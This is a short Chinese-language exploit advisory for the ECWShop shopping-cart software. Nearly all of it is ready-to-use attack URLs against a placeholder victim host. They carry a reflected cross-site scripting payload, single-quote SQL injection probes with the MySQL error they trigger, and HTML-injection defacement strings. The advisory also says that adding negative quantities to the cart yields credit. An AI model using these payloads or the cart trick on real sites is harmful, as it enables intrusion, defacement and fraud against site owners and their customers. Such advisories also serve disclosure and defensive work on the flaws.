ECWShopindex.php远程SQL注入漏洞 Exploit

                                                跨站脚本：

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><script>var%20xss=31337;alert(xss);</script>

信息泄漏和可能的SQL注入:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min='&max=1
http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max='

Error:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource in /var/www/html/search.php on line 109

HTML注入:

http://www.victim.com/index.php?c=srch&ctg=Cat_1&id=754ce025144839c2abe369c36d90d8e9&key=1&comp=1&min=1&max=><H1>DEFACED!</H1>
http://www.victim.com/index.php?id=754ce025144839c2abe369c36d90d8e9&c=srch&id=754ce025144839c2abe369c36d90d8e9&key=&ctg=<H1>DEFACED!</H1>&comp=&min=1&max=1

购物车/订单控制:

可以向购物车中添加负值获得信用.